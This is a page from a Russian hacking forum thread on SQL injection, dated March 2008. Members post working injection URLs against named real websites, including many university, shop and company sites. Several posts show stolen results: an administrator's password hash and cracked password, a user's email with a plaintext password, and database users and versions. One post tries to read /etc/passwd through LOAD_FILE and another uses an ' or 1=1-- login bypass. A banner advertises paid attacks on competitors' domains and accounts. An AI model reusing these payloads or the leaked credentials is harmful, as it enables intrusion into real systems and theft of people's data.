Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 509 из 1242

509

Опции темы

Поиск в этой теме

Опции просмотра

#5081

12.03.2008, 22:01

vp$

Участник форума

Регистрация: 22.10.2007

Сообщений: 138

Провел на форуме:
2454040

Репутация: 177

Отправить сообщение для vp$ с помощью ICQ

www.stroyprice.com PR4;ТИЦ950

Код:

http://stroyprice.com/kom_one.php?i=541000000+UNION+SELECT+1,concat_ws(0x3a,admin_fullname,admin_pw,admin_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+phpads_config+limit+0,1/*

Administrator:5ebe2294ecd0e0f08eab7690d2a6ee69:inf o@stroyprice.com пасс secret

ну еще 3к юзеров с открытыми паролями

Код:

http://stroyprice.com/kom_one.php?i=541000000+UNION+SELECT+1,concat_ws(0x3a,usr_name,usr_mail,usr_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+str_tbl_usr+limit+0,1/*

kolya:grischenko@zap.kiev.ua:Lord21

#5082

13.03.2008, 02:45

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Код:

http://www.chameleondeal.com/coupons/category.asp?ID=1%20or%201=(SELECT+TOP+1+cast(id+as+nvarchar)%2B%27%3A%27%2Bcast(FName+as+nvarchar)%2B%27%3A%27%2Bcast(MName+as+nvarchar)%2B%27%3A%27%2Bcast(LName+as+nvarchar)%2B%27%3A%27%2Bcast(Email+as+nvarchar)%2B%27%3A%27%2Bcast(StreetAddress+as+nvarchar)%2B%27%3A%27%2Bcast(City+as+nvarchar)%2B%27%3A%27%2Bcast(State+as+nvarchar)%2B%27%3A%27%2Bcast(Zip+as+nvarchar)%2B%27%3A%27%2Bcast(HomePhone+as+nvarchar)%2B%27%3A%27%2Bcast(WorkPhone+as+nvarchar)%2B%27%3A%27%2Bcast(Cell+as+nvarchar)%2B%27%3A%27%2Bcast(Pager+as+nvarchar)%2B%27%3A%27%2Bcast(Fax+as+nvarchar)%2B%27%3A%27%2Bcast(UserName+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)%2B%27%3A%27%2Bcast(DateEntered+as+nvarchar)%2B%27%3A%27%2Bcast(DateModified+as+nvarchar)+from+Staff)--

Код:

http://www.chameleondeal.com/coupons/category.asp?ID=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('Coupons','Categories','deal','Deals','dtproperties','News','Oshkosh_west','Retailers','Staff','sysconstraints','syssegments','t_jiaozhu'))--

+ в админке ' or 1=1--

#5083

13.03.2008, 09:58

heks

Постоянный

Регистрация: 24.08.2007

Сообщений: 474

Провел на форуме:
1484154

Репутация: 126

Отправить сообщение для heks с помощью ICQ

http://www.itelltd.kiev.ua/index.php?page=equipment&id=111&man_id=0x27%20unio n+select+1,LOAD_FILE(0x2f6574632f706173737764),LOA D_FILE(0x2f6574632f706173737764),4,5,6,7,8,9+from+ news/*

ни чего не получается ни кто не скажет ПОЧЕМУ?

#5084

13.03.2008, 17:38

krypt3r

Познавший АНТИЧАТ

Регистрация: 27.04.2007

Сообщений: 1,044

Провел на форуме:
3660186

Репутация: 905

Ну раз не работает Load_file, то логично предположить, что нет соответствующих прав, не так ли?

#5085

13.03.2008, 18:22

~~cash$$$~~

Banned

Регистрация: 06.01.2008

Сообщений: 413

Провел на форуме:
1301036

Репутация: 1334

Отправить сообщение для cash$$$ с помощью ICQ

Цитата:

http://hardmoney.pro/lending/lending.php?ID=99999+union+select+1,2,3,VERSION(), 5,6,7,8,9,10,11,12,13,14,15,16/*

VERSEON: 4.1.21-community-nt
USER: ksifunding@69.24.64.101
DATABASE: ksifunding

Цитата:

http://www.global-money.com/item.php?id=99999'+union+select+1,2,VERSION(),4,5, 6,7,8,9,10,11,12,13,14,15,16,17/*

VERSEON: 4.0.26
USER: globalmo@global-money.com
DATABASE: global_money_com_dev

#5086

13.03.2008, 18:44

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

http://freedocumentaries.org/film.php?id=-98+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+user*

Лень подбирать вапще(. Когда пытаюсь выполнить запрос
http://freedocumentaries.org/film.php?id=-98+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*, то пишет мол в запросе другое количество столбцов:РР. или я отупел от столь длительного бездействия, или...или... пора на покой:Р.Встречал на многих сайтах и не раз входил в столько своеобразный тупняк =___=

#5087

13.03.2008, 21:06

Ershik

Постоянный

Регистрация: 07.11.2007

Сообщений: 392

Провел на форуме:
1325167

Репутация: 100

Движок Интернет магазина

http://www.vcam.ru/index.php?id=-1+union+select+user()/*
user: vcam_vcam@localhost
version : 4.1.22-standard
database : vcam_shop

http://www.combox.ru/index.php?id=3+union+select+1,2/*
user : combox_combox@localhost
database : combox_site
version : 4.1.22-standard

Это кстати, главная страница хостинга, и разработчика магазина. Как видите, уязвимость здесь тоже есть

http://www.ventorg.ru/divisions.php?id=-1+union+select+1,2,3,4/*
user : ventorg_torg@localhost
database : ventorg_shop
version : 4.1.22-standard

#5088

14.03.2008, 00:34

CaNNabi$

Познающий

Регистрация: 21.01.2008

Сообщений: 85

Провел на форуме:
839509

Репутация: 338

Отправить сообщение для CaNNabi$ с помощью ICQ

http://www.vcam.ru

http://www.ventorg.ru

Боян, блин создали и обновили же АНТИБОЯН вот ТУТ

#5089

14.03.2008, 13:40

Dr.Z3r0

Leaders of The World

Регистрация: 06.07.2007

Сообщений: 246

Провел на форуме:
2030482

Репутация: 1796

Так вот вообщем скину вам скули что насоберал в едушках. Собственно это те едухи что не смог похенкать либо впадлу брутить имена таблиц во всех 4ых ветках.

apps.sais-jhu.edu

Код:

http://apps.sais-jhu.edu/faculty_bios/faculty_bio1.php?ID=-67 UNION SELECT 1,2,3,4,5,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
saisforu_gjbarru@localhost : 4.1.22-standard : saisforu_faculty

biomedical.rutgers.edu

Код:

http://biomedical.rutgers.edu/faculty.php?id=-7 UNION SELECT 1,2,3,4,5,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()),7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
bme@coewww.rutgers.edu : 4.1.21 : bme

blogsforlearning.msu.edu

Код:

http://blogsforlearning.msu.edu/articles/view.php?id=-7 UNION SELECT 1,2,3,UNHEX(HEX(CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()))),5,6,7,8,9/*
4.1.13a-log : blogsforlearning@tempcas.cas.msu.edu : blogsforlearning

dma.ucla.edu

Код:

http://dma.ucla.edu/people/faculty.php?ID=-9%20UNION%20SELECT%201,2,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16/*
dma@constitution.design.ucla.edu : 4.1.20 : dma

duckhenge.uoregon.edu

Код:

http://duckhenge.uoregon.edu/io/article.php?id=-766 UNION SELECT 1,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
5.0.32-Debian_7etch1-log : io@localhost : io

experts.uchicago.edu

Код:

http://experts.uchicago.edu/experts.php?id=-174 UNION SELECT 1,2,3,4,CONCAT_WS(0x203A,USER(),VERSION(),DATABASE()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
www@localhost :4.0.24-standard :newsoffice
FILE_PRIV=Y

journalism.berkeley.edu

Код:

http://journalism.berkeley.edu/events/details.php?ID=371 UNION SELECT 1,2,3,4,5,6,7,8,9,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/*
4.1.22 : jschool@localhost : events

llk.media.mit.edu

Код:

http://llk.media.mit.edu/projects.php?id=-783 UNION SELECT 1,2,3,4,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),6,7,8/*
4.1.20 : llk@www2.media.mit.edu : llk

newmedia.cdws.ucf.edu

Код:

http://newmedia.cdws.ucf.edu/pressBoxArticle.php?id=15' AND 1=0 UNION SELECT 1,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()),3,4,5/*
newmediawww@localhost : 5.0.24a-community-nt : newmediawww
PS там wordpress но там хрень какаято

qt.exploratorium.edu

Код:

http://qt.exploratorium.edu/cils/resourcelist.php?categoryID=-287 UNION SELECT UNHEX(HEX(CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE())))/*
resource_centers@qt.exploratorium.edu : 4.1.15-log : resource_centers

urology.jhu.edu

Код:

http://urology.jhu.edu/about/faculty.php?id=59' AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
4.1.20 : users@localhost : WEB

www.agi.harvard.edu

Код:

http://www.agi.harvard.edu/events/download.php?id=-94 UNION SELECT 1,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.20-log : agi@socrates.harvard.edu : agi

www.choices.edu

Код:

http://www.choices.edu/resources/detail.php?id=-26 UNION SELECT 1,UNHEX(HEX(CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
choices@charlie.services.brown.edu : 4.1.14-log : Choices

www.ee.virginia.edu

Код:

http://www.ee.virginia.edu/profile.php?ID=-8 union select 1,2,3,4,5,6,7,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()),9,10,11,12,13,14,15,16,17,18,19,20,21/*
php@localhost : 4.1.20 : ECEWeb

www.eng.wayne.edu

Код:

http://www.eng.wayne.edu/page.php?id=-1505 UNION SELECT 1,2,3,4,5,6,7,8,UNHEX(HEX(CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()))),10,11,12/*
coeweb@localhost : 4.1.13-standard-log : coeweb
FILE_PRIV=Y

www.psych.ucla.edu

Код:

http://www.psych.ucla.edu/Faculty/faculty.php?area=3&id=47 AND 1=0 UNION SELECT 1,2,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
psychweb@phoenix.lifesci.ucla.edu : 4.0.15 : psychadmin

Ну и для супер извращенцев 3 ветки мускуля:

Код:

http://wagner.nyu.edu/news/newsStory.php?id=525 AND 3=SUBSTRING(VERSION(),1,1)/*
http://ux.brookdalecc.edu/content.php?ID=114 AND 3=SUBSTRING(VERSION(),1,1)/*
http://bti.cornell.edu/pgrp/pgrp.php?id=602' AND 3=SUBSTRING(VERSION(),1,1)/*

__________________

Кто я?..

Сайты с хорошим ПР

#5090

14.03.2008, 23:13

t0ox

Новичок

Регистрация: 23.10.2007

Сообщений: 17

Провел на форуме:
105851

Репутация: 46

Сайты с хорошим ПР

Цитата:

http://www.signs.pl/article.php?sid=-1+union+select+1,2,3,version(),5,6,7,8,9,10+from+u sers/*
PR: 5
5.1.19-beta

Эх, тоже когдато на сеате ездил

Цитата:

http://www.seat.gr/news/news.php?id=-1+UNION+SELECT+1,version(),3,4,5/*
PR: 6
4.0.27

Цитата:

http://www.krosno24.pl/informacje.php3?id=-1+union+select+1,2,3,4,5,6,version(),8,9/*
PR: 4
4.0.26

Цитата:

http://www.rtp.org/main/index.php?pid=-1+UNION+SELECT+1,2,version()/*
PR: 6
5.0.22

Цитата:

http://www.cnts.ru/price.dhtml?cid=-1+union+select+1,version(),3,4/*
http://www.cnts.ru/price.dhtml?cid=-1+union+select+1,password,login,4+from+users/*
http://www.cnts.ru/price.dhtml?cid=-1+union+select+1,concat(login,char(58),password),3 ,4+from+users/*
PR: 3
4.1.21-log

Цитата:

http://www.ochenk.com/entry.php?id=-1+union+select+1,2,3,version()/*
PR: 6
4.1.22-standard

Последний раз редактировалось t0ox; 14.03.2008 в 23:39..

Страница 509 из 1242

509

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход